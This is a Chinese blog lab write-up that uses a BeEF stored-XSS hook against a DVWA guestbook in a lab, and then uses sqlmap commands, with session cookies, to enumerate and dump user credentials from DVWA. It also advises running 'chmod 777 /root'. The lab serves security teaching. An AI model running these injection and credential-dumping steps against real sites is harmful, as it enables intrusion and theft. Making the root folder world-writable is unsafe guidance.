XSS攻击和SQL注入

最新推荐文章于 2024-02-17 21:20:52 发布
最新推荐文章于 2024-02-17 21:20:52 发布
阅读量849 收藏 8
点赞数 2
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51920627/article/details/110007504
版权

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

XSS部分:利用Beef劫持被攻击者客户端浏览器

1.利用AWVS扫描目标网站,发现其存在XSS漏洞在这里插入图片描述

2.Kali使用beef生成恶意代码
在这里插入图片描述
3.访问漏洞网站,将以下恶意代码写入网站留言板

其中10.21.122.212为kali的IP地址

在这里插入图片描述

4.只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持
在这里插入图片描述
可以在Beef控制端查看目标主机,目标主机已经被劫持了
在beef操控台给被劫持主机发消息在这里插入图片描述
在这里插入图片描述
在beef控制被劫持主机浏览器跳转到目标网址在这里插入图片描述
在这里插入图片描述
5.该XSS攻击属于存储型

攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存型XSS的危害会更大。

存储型 XSS 一般出现在网站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中。

SQL注入部分:DVWA+SQLmap+Mysql注入实战

1.注入点发现。首先要判断是否有注入漏洞
在输入框输入1,返回
返回正常;在这里插入图片描述
再次输入1’,报错,返回在这里插入图片描述
此时可以断定有SQL注入漏洞
下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低。在这里插入图片描述

2、枚举当前使用的数据库名称和用户名

• -u :指定目标URL,即注入点
• --cookies:当前会话的cookies值
• -b:获取数据库类型,检索数据库管理系统标识
• --current-db:获取当前数据库
• --current-user:获取当前登录数据库使用的用户
在kali输入的命令:
sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ -b --current-db --current-user在这里插入图片描述
3、枚举数据库用户名和密码
-string :当查询可用时用来匹配页面中的字符串
–users:枚举数据库用户名
-password:枚举数据库用户的密码(hash)

我输入的命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” --users --password在这里插入图片描述
4、枚举数据库
• --dbs:枚举当前数据库
命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” --dbs 这个是查看mysql数据库在这里插入图片描述
5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表
命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ -D dvwa --tables 这个是查看dvwa的数据库在这里插入图片描述
6、获取指定数据库和表中所有列的信息
• -D:指定的数据库
• -T:指定数据库中的数据表
• --columns:获取列的信息
命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” -D dvwa -T users --columns在这里插入图片描述
7、枚举指定数据表中的所有用户名与密码,并down到本地
-C:枚举数据表中的列
–dump:存储数据表项
命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” -D dvwa -T users -C user,password --dump在这里插入图片描述
在这里插入图片描述
查看down到本地的用户名与密码(带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

打开控制台,切换ROOT用户输入su,输入密码,然后输入以下命令:
chmod 777 /root

然后就可以正常打开需要权限的root文件夹了。在这里插入图片描述

麻麻ma
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入xss攻击常见形式和解决方法
01-01
sql注入xss攻击常见形式和解决方法。doc
vue常见面试题
YanJing1314的博客
12-14 289
1、 2、
XSS攻击详解
最新发布
xllllll___的博客
02-17 1209
1.盗用cookie,获取用户的敏感信息;2.利用iframe,frame等方式,以用户的身份执行一些管理动作,或者执行一些一般的行为比如说发私信,加好友等;3.在一些访问量极大的页面上进行XSS攻击可以攻击一些小型网站;4.利用一些可被攻击的域或者其它的域信任的特点,以受信任来源的身份请求一些平时不被允许的操作。
XSS攻击sql注入
u010287873的博客
03-21 156
速度
实验二、XSS和SQL注入
weixin_30525825的博客
05-21 540
一、 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 二、 系统环境:Kali Linux2、Windows 三、 网络环境:交换网络结构 四、 实验工具:AWVS(Acunetix Web Vulnar...
xss攻击 SQL注入
qq_65208982的博客
06-10 958
QL注入,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。SQL 注入一般发生在用户交互场景中,比如需要用户自已输入信息的输入框,或者下拉选择选项的这种,如果不做好输入内容的过滤,就很可能发生 SQL 注入。
预防XSS攻击SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
网络安全技术+XSS攻击SQL注入攻击
04-11
XSS攻击SQL注入攻击 网络安全技术初级学生
xss攻击sql注入
03-19
xss攻击sql注入
sql注入xss攻击, springmv拦截器
07-24
sql注入xss攻击, springmv拦截器,可自由调整需要拦截的字符
xss和sql注入
Coisini的博客
05-22 944
在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全. XXXXXX...
【白帽子学习笔记】XSS和SQL注入
python_LC_nohtyp的博客
11-17 1508
【白帽子学习笔记】XSS和SQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSS和SQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
浅谈SQL注入XSS攻击
DFS的博客
03-27 982
作为计算机小白,一直都认为黑客很牛逼所以简单的了解一下这反面的知识——信息安全 黑客是个英译词,译作Hacker。黑客攻击或者黑计算机的方式多种多样,主要分为两种: (1)非破坏性的攻击:一般是为了扰乱系统的运行,并不盗窃系统资料,仅仅只是使服务器暂时失去对外提供服务的能力,通常采用拒绝服务攻击或信息炸弹 (2)破坏性攻击:是以侵入他人电脑系统、盗窃系统保密信息、破坏目标系统的数据为目的 常见的攻...
一文搞懂 XSS攻击SQL注入、CSRF攻击、DDOS攻击、DNS劫持
国内某知名游戏公司小菜鸡工程师
08-08 4685
学好网络安全,以己之矛护己之盾
浅析:XSS攻击SQL注入攻击和CSRF攻击
象在舞的技术专栏
08-11 1059
1、XSS(Cross Site Script)攻击    跨站脚本攻击,是在用户浏览网页时向用户浏览器中执行恶意脚本的攻击方式。    跨站脚本攻击分有两种形式:反射型攻击(诱使用户点击一个嵌入恶意脚本的链接以达到攻击的目标,目前有很多攻击者利用论坛、微博发布含有恶意脚本的URL就属于这种方式)和持久型攻击(将恶意脚本提交到被攻击网站的数据库中,用户浏览网页时,恶意脚本从数据库中被加载到页面
防止xss攻击sql注入
aguiyi3968的博客
03-10 190
防止xss攻击sql注入 XSS xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制...
sql注入xss攻击
Zhooson的博客
05-31 1806
SQL注入 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 [1] 比如先前的很多影视网站泄露VIP会员密码大多就是通过...
SQL注入XSS攻击
neverSaynever_的博客
02-20 1550
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
XSS与SQL的简单介绍
qq_53188113的博客
12-23 869
XSS 1、什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 2、什么是XSS攻击 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTML语言允许使用脚本进行简单交互,入..
springboot如何实现使用过滤器防止xss攻击sql注入
06-09
Spring Boot可以通过使用过滤器(Filter)来防止XSS攻击SQL注入。 1. 防止XSS攻击:可以使用过滤器对请求参数进行过滤,将其中的特殊字符进行转义,从而避免XSS攻击。例如,可以使用Jsoup库中的`clean`方法来过滤HTML标签。 2. 防止SQL注入:可以使用过滤器对请求参数进行过滤,将其中的特殊字符进行转义,从而避免SQL注入。例如,可以使用`org.springframework.web.util.HtmlUtils.htmlEscape`方法对请求参数进行转义。 以下是一个示例过滤器的代码: ```java @Component @Order(Ordered.HIGHEST_PRECEDENCE) public class XssSqlFilter implements Filter { @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { HttpServletRequest req = (HttpServletRequest) request; // XSS过滤 XssHttpServletRequestWrapper xssRequest = new XssHttpServletRequestWrapper(req); // SQL注入过滤 SqlFilterRequestWrapper sqlRequest = new SqlFilterRequestWrapper(xssRequest); chain.doFilter(sqlRequest, response); } } ``` 其中,`XssHttpServletRequestWrapper`和`SqlFilterRequestWrapper`分别是对`HttpServletRequest`的包装类,用于在请求中过滤XSS和SQL注入。 需要注意的是,过滤器的执行顺序可以通过实现`Ordered`接口来指定,从而保证过滤器的正确执行顺序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值